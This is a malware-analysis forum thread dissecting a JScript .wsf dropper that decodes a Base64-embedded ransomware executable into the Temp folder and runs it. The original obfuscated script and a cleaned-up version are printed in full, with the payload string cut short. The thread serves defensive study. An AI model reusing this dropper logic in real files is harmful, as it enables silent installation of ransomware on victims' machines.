Malware Analysis 'sales report 5170.wsf' sample - dropper - very basic obfuscation method

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
http://malwaretips.com/threads/22-7-16-6-samples.61625/

sales report 5170.wsf
12/55
https://www.virustotal.com/en/file/...c38a4a74e12136a9ed7bd8a16156626865e/analysis/

Exe file dropped :
syf4J4dMPJO14jlw.exe
10/54
https://www.virustotal.com/en/file/c3b420406e887b6e41425ef5bdb2214a9da95ff9d8fc1395faaee131e7bf7a4e/analysis/

I have chosen this sample, because :
- I think that it is the worst obfuscation method I have seen this last months :eek:
- it's a dropper, but the exe data (ransomware) isn't very obfuscated in the sales report 5170.wsf

Just compare with my precedent analysis (an obfuscated JS downloading a VERY obfuscated ransomware and modifying it to create a runnable exe)
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/

Script used : Jscript

Main part :

try {

from_var_to_bin_File(v_bin_B64Encoded, bin_Path);
from_bin_File_to_exe_File(bin_path, exe_Path);
Shell.Run( exe_Path + " 321");
}
catch (e) {};


(1) The ransomware is hard coded in the wsf file, in a var as a Base64 encoded String :

var v_bin_64Encoded = "TVqQAAMAAAAEAAAA//8AAAAAAA................................=";

I show only a small part for security purpose (and because there is a lot of chars :p)

(2) Path are constructed :

var Shell =
WScript.CreateObject("WScript.Shell");

var Path =
Shell.ExpandEnvironmentStrings("%TEMP%/");
// "C:\Users\DardiM\AppData\Local\Temp/"

var exe_Path= Path + "syf4J4dMPJO14jlw.exe";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe"

var bin_Path= exe_Path+ ".bin";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin"

(3) One function is used to copy this string to a file with .bin extension :

function from_var_to_bin_File(v_bin_64Encoded, bin_Path)
{
object_FileSystem = new ActiveXObject("Scripting.FileSystemObject");

file = object_FileSystem.
OpenTextfile(bin_Path, 2, true);
// 2: Opens the file using the system default
//true: create file if it doesn't exist

file.write(v_bin_64Encoded);
file.
Close();
// here "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin" is created

file = object_FileSystem.OpenTextfile(bin_Path, 1);
//1: Open a file for reading only.

return file.
ReadLine(); // return value never used
}

(4) Another function is used to read the .bin file, decode the content and write it to an exe file :

function from_bin_File_to_exe_File(bin_Path, exe_Path) {

var object_FileSystem = WScript.CreateObject("Scripting.FileSystemObject");
//Provides access to a computer's file system

var Object_File = object_FileSystem.
GetFile(bin_Path);
//Returns a File object corresponding to the file in a specified path

var file_TextSteam = Object_File.
OpenAsTextStream(1, 0);
//TextStream linked to the file opened

var xmlDoc =
WScript.CreateObject("MSXml2.DOMDocument");
// xml document

var objNode = xmlDoc.
CreateElement("Base64Data");
// Element

objNode.datatype = "bin.base64";
// Element datatype

objNode.text = file_TextSteam.ReadAll();
// Base64 encoded String

var object_ADODBStream = WScript.CreateObject("ADODB.Stream");
object_ADODBStream.
Type = 1; //binary
object_ADODBStream.Open();

object_ADODBStream.
Write(objNode.nodeTypedValue);
// Base64 decoded String wrote to the Stream as binary !

object_ADODBStream.SaveTofile(exe_Path, 2);
// exe file created with real content
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe""

file_TextSteam.
Close();
object_ADODBStream.
Close();
}

(4) Then the exe file is run :

Shell.Run( exe_Path + " 321");

=> need a parameter (like in my precedent post)

(5) Conclusion :

- Very easy to deobfuscate this sample, the creator was certainly too tired to obfuscate it better :rolleyes:
- Base64 decoder method is interesting (using a node of a temporary xml object in memory)
- It is also very easy to obtain quickly the exe file (copy and paste the Base64 encoded string on a tool (notepad++), Base64 decode, save the result on a file with .exe extension ... ), to send it to virus total, for example, but as it need a parameter, we won't obtain a realistic dynamical analysis this way :p
https://www.hybrid-analysis.com/sam...f9d8fc1395faaee131e7bf7a4e?environmentId=100/

=> it's better to submit the .wsf file :)
<job>
<script language="Jscript">
function GTd(Km1){return Km1;};var EPm8 = "1" + "";
var KPz = " 32" + "";
function Uz(JLc){return JLc;};var Ot1 = "Run" + "";
var Bn = "in" + "";
var EUk = ".b" + "";
var UXg = "xe" + "";
var MCt = ".e" + "";
function SXa(DFf){return DFf;};var Ab6 = "jlw" + "";
var VCt = "O14" + "";
var Bx = "PJ" + "";
var KRn4 = "4dM" + "";
var ZZo4 = "4J" + "";
var NAe = "syf" + "";
var KOx = "%/" + "";
var Pc1 = "EMP" + "";
var DUw = "%T" + "";
var Hx = "hell" + "";
var SDs = "pt.S" + "";
var Vm = "cri" + "";
var Ry = "WS" + "";
var HKt = "bject" + "";
var Vw9 = "teO" + "";
var JVg = "Crea" + "";
function Mp0(WNv1){return WNv1;};var Dn6 = "ine" + "";
var QZs3 = "adL" + "";
var VNa = "Re" + "";
var BPv = "ile" + "";
var WXa5 = "tF" + "";
var Uh = "nTex" + "";
var XUq = "Ope" + "";
var Ed5 = "Close" + "";
var LQw1 = "te" + "";
var Ln9 = "Wri" + "";
function EUk4(Xr4){return Xr4;};
function Ow(WWs){return WWs;};
function JOl(NVs4){return NVs4;};
function OPo(Oe8){return Oe8;};
var ABj = "le" + "";
var UXt = "Fi" + "";
var KPt5 = "Text" + "";
var IBm = "en" + "";
var Ci0 = "Op" + "";
var Xq8 = "t" + "";
var Mf7 = "Objec" + "";
var Ro = "tem" + "";
var Li = "ys" + "";
var DVr7 = "FileS" + "";
var PTw4 = "ng." + "";
var Hc = "ripti" + "";
var Aa0 = "Sc" + "";
var Ce0 = "se" + "";
var NBi2 = "Clo" + "";
function Be6(KAc){return KAc;};var Wi7 = "e" + "";
var Ae1 = "os" + "";
var Cs = "Cl" + "";
var Rp = "File" + "";
var DPx = "veTo" + "";
var My = "Sa" + "";
var RTe4 = "lue" + "";
var XYu0 = "pedVa" + "";
var Lw = "Ty" + "";
var Kv0 = "de" + "";
var ELo7 = "no" + "";
function Oq7(Mq){return Mq;};var REp = "ite" + "";
var Rk = "Wr" + "";
var MDl = "n" + "";
var Az6 = "Ope" + "";
var Sk = "Type" + "";
function OXr9(LHs){return LHs;};var Lr = "am" + "";
var HFx = ".Stre" + "";
var Rw0 = "ODB" + "";
var Ep = "AD" + "";
var Gf4 = "ct" + "";
var Xx4 = "je" + "";
var JZm = "eOb" + "";
var Bd0 = "eat" + "";
var IZg7 = "Cr" + "";
var Kv = "ll" + "";
var QSa = "ReadA" + "";
var Vk1 = "text" + "";
var QVk1 = "4" + "";
var FZn = "ase6" + "";
var Yc = "n.b" + "";
var Jx3 = "bi" + "";
function Pe(No5){return No5;};var PXd1 = "e" + "";
var Kz0 = "yp" + "";
var Tw = "aT" + "";
var DSw0 = "dat" + "";
var Sb1 = "a" + "";
var Fj7 = "64Dat" + "";
var YZc7 = "Base" + "";
var Yb9 = "ement" + "";
var Vc1 = "ateEl" + "";
var WLg = "cre" + "";
function Ta(Cl7){return Cl7;};var BBg = "nt" + "";
var Tb7 = "ume" + "";
var KIv7 = "Doc" + "";
var NMj = "OM" + "";
var ISc = "ml2.D" + "";
var Rz6 = "MSX" + "";
var Aa = "ject" + "";
var WWa9 = "Ob" + "";
var KMn = "eate" + "";
var Fp9 = "Cr" + "";
var PJc = "m" + "";
var Us4 = "Strea" + "";
var Qq = "ext" + "";
var AWo = "AsT" + "";
var Sv = "Open" + "";
var CSq = "e" + "";
var FSp8 = "Fil" + "";
var NTy = "Get" + "";
function Zr8(Kc1){return Kc1;};function PXq(Hk){return Hk;};var EYw = "ct" + "";
var Sk9 = "je" + "";
var VSa3 = "Ob" + "";
var Yb = "ystem" + "";
var Uw = "FileS" + "";
var TTn = "ting." + "";
var Sg = "ip" + "";
var Il = "Scr" + "";
function Yf(Pa8){return Pa8;};var Sh = "ect" + "";
var TSg = "teObj" + "";
var HXt5 = "Crea" + "";

var v_bin = "TVqQAAMAAAAEAAAA//8AAAAAAA....=";

// exe file content hidden in a Base64 Encoded string

var Tv0 = 1
var Aw = 0
var UMt = (1 * 2)
var IXf3 = 1

function EOk(HKp0, Bs) {

var Mp = WScript[HXt5 + (function Wg2(){return TSg;}()) + Yf(Sh)](Il + Sg + TTn + Zr8(Uw) + Yb + VSa3 + Sk9 + (function Rv(){return EYw;}()));
var Tr = Mp[NTy + FSp8 + CSq](HKp0);
var Wr /* G */ = Tr[Sv + AWo + Qq + Us4 + PJc](Tv0, Aw);

var QWa = WScript[HXt5 + TSg + Sh](Rz6 + ISc + Ta(NMj) + KIv7 + Tb7 + (function IAg0(){return BBg;}()));
var Ll8 = QWa[WLg + Vc1 + Yb9](YZc7 + Fj7 + Sb1);
Ll8[Pe(DSw0) + (function VUj(){return Tw;}()) + Kz0 + PXd1] = "bin.base64";

Ll8[Vk1] = Wr[QSa + Kv]();

var Xv1 = WScript[HXt5 + TSg + Sh]((function STl8(){return Ep;}()) + Rw0 + OXr9(HFx) + Lr);
Xv1[Sk] = IXf3;
Xv1[Az6 + MDl]();

Xv1[Rk + REp](Ll8[ELo7 + Kv0 + Lw + (function AFx9(){return XYu0;}()) + RTe4]);
Xv1[My + DPx + Rp](Bs, UMt);

Wr[Cs + Ae1 + Wi7]();
Xv1[(function Qw0(){return Cs;}()) + Ae1 + (function AIy(){return Wi7;}())]();
}


function TYs(CWy, Bs)
{

var EPy4, GXy, Zg
var YZl = 1, XQs = 2;
EPy4 = new ActiveXObject(Il + Sg + TTn + (function Wn3(){return Uw;}()) + Yb + PXq(VSa3) + Sk9 + EYw)
GXy = EPy4[EUk4(Ci0) + IBm + KPt5 + UXt + ABj](Bs, XQs, true)
GXy[Rk + Oq7(REp)](CWy);
GXy[Cs + Be6(Ae1) + Wi7]();
GXy = EPy4[Ow(Ci0) + JOl(IBm) + KPt5 + OPo(UXt) + ABj](Bs, YZl);
Zg = GXy[VNa + Mp0(QZs3) + Dn6]();
return(Zg);
}

var KWx=WScript[HXt5 + TSg + Sh](Ry + Vm + SDs + Hx);
var Zp=KWx.ExpandEnvironmentStrings(DUw + (function Bm(){return Pc1;}()) + KOx);
var OOq=Zp + NAe + (function Zb(){return ZZo4;}()) + KRn4 + Bx + SXa(VCt) + Ab6;
var JOv7=OOq + MCt + UXg;
var v_binpath=JOv7+EUk+Bn;

try {

TYs(v_bin, v_binpath);
EOk(v_binpath, JOv7);
KWx[Uz(Ot1)](JOv7 + GTd(KPz) + EPm8);
}
catch (e) {};

</script>
</job>
<job>
<script language="Jscript">

v_bin_64Encoded = "TVqQAAMAAAAEAAAA//8AAAAAAA....=";

// ransomware Base64 encoded (i cut a big part)

var Shell = WScript.CreateObject("WScript.Shell");
var Path =
Shell.ExpandEnvironmentStrings("
%TEMP%/");
// "C:\Users\DardiM\AppData\Local\Temp/"


var exe_Path= Path + "syf4J4dMPJO14jlw.exe";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe"

var bin_Path=exe_Path+ ".bin";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin"


try {
from_var_to_bin_File(v_bin_B64Encoded, bin_Path);
from_bin_File_to_exe_File(v_binpath, exe_Path);
Shell.Run( exe_Path + " 321");
}
catch (e) {};

function from_bin_File_to_exe_File(bin_Path, exe_Path) {
var object_FileSystem = WScript.CreateObject("Scripting.FileSystemObject");
//Provides access to a computer's file system

var Object_File = object_FileSystem.
GetFile(bin_Path);
//Returns a File object corresponding to the file in a specified path

var file_TextSteam = Object_File.
OpenAsTextStream(1, 0);
//TextStream linked to the file opened

var xmlDoc = WScript.CreateObject(
"MSXml2.DOMDocument");
// xml document

var objNode = xmlDoc.
CreateElement("Base64Data");
// Element

objNode.datatype = "bin.base64";

objNode.text = file_TextSteam.
ReadAll();
// all the Base64 encoded String

var object_ADODBStream = WScript.CreateObject("ADODB.Stream");
object_ADODBStream.
Type = 1; // binary
object_ADODBStream.Open();

object_ADODBStream.
Write(objNode.nodeTypedValue);
//Write to the Stream Base64 decoded data
object_ADODBStream.SaveTofile(exe_Path, 2);
//Save the exe file wih decoded content

file_TextSteam.
Close();
object_ADODBStream.Close();

}



function from_var_to_bin_File(v_bin_64Encoded, bin_Path)
{

object_FileSystem = new ActiveXObject("Scripting.FileSystemObject");
file = object_FileSystem.OpenTextfile(bin_Path, 2, true)
// 2: Opens the file using the system default
// true: create file if doesn't exist

file.write(v_bin_64Encoded);
file.
Close();

file = object_FileSystem.
OpenTextfile(bin_Path, 1);
// 1: Open a file for reading only.

return file.
ReadLine();
}

</script>
</job>
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
With Shadow Defender enabled
I tried to test sales report 5170.wsf :
It creates the exe file, run it
=> syf4J4dMPJO14jlw.exe makes few tasks (mainly loading dll and looking for some registry values, files) and exit without doing his real work
 
Last edited:

Der.Reisende

Level 45
Honorary Member
Top Poster
Content Creator
Malware Hunter
Dec 27, 2014
3,423
Great job, thank you for sharing @DardiM :) How many hours did that cost you?:p
It's interesting that it seems to be aware of SD as it was an VM, judging from your second post :)
 
  • Like
Reactions: frogboy and DardiM

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Great job, thank you for sharing @DardiM :) How many hours did that cost you?:p
It's interesting that it seems to be aware of SD as it was an VM, judging from your second post :)
Thanks for your great words :)

It cost more time to make a readable post than to analysis this sample :oops:

With or without the parameter needed ( "321"), the ransomware has done almost the same task. As I ran it on SD, I thought like you said.
The best way to be sure, is to clone a system and make a real test on it, what I can't currently do , because I have not got other Drive available :(
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top